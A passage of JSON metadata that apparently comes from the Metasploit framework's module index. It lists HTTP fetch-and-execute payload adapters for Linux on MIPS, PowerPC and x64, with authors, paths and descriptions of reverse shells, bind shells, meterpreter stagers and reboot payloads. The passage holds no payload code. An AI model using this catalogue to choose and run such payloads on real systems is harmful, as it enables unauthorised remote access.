"Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a MIPS64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 13:20:59 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/mipsbe/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/exec", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/meterpreter", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/http/mipsbe/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/reboot": { - "name": "HTTP Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/http/mipsbe/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/reboot", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/mipsbe/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/shell", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/http/mipsbe/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/mipsbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsbe/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/mipsbe/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [ - "EDB-18226" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsbe/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsbe", - "adapted_refname": "linux/mipsbe/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsle/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/mipsle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/exec", - "staged": false - }, - "payload_cmd/linux/http/mipsle/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/meterpreter", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/http/mipsle/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/mipsle/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/mipsle/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsle/reboot": { - "name": "HTTP Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/http/mipsle/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/reboot", - "staged": false - }, - "payload_cmd/linux/http/mipsle/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/mipsle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsle/shell", - "stager_refname": "linux/mipsle/reverse_tcp" - }, - "payload_cmd/linux/http/mipsle/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/mipsle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "scut", - "vaicebine", - "Vlatko Kosturjak", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/mipsle/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/mipsle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "rigan ", - "juan vazquez " - ], - "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/mipsle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/mipsle", - "adapted_refname": "linux/mipsle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/ppc/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:49 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/ppc/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:49 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/ppc/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an PPC payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:49 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc", - "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/ppc64/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/ppc64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:57 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64", - "adapted_refname": "linux/ppc64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/ppc64/shell_find_port": { - "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/http/ppc64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:57 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64", - "adapted_refname": "linux/ppc64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/http/ppc64/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/ppc64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute an PPC64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-12 15:51:57 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64", - "adapted_refname": "linux/ppc64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/ppc64le/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/ppc64le/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/ppc64le/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/ppc64le/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a PPC64LE payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/exec", - "staged": false - }, - "payload_cmd/linux/http/x64/meterpreter/bind_tcp": { - "name": "HTTP Fetch, Bind TCP Stager", - "fullname": 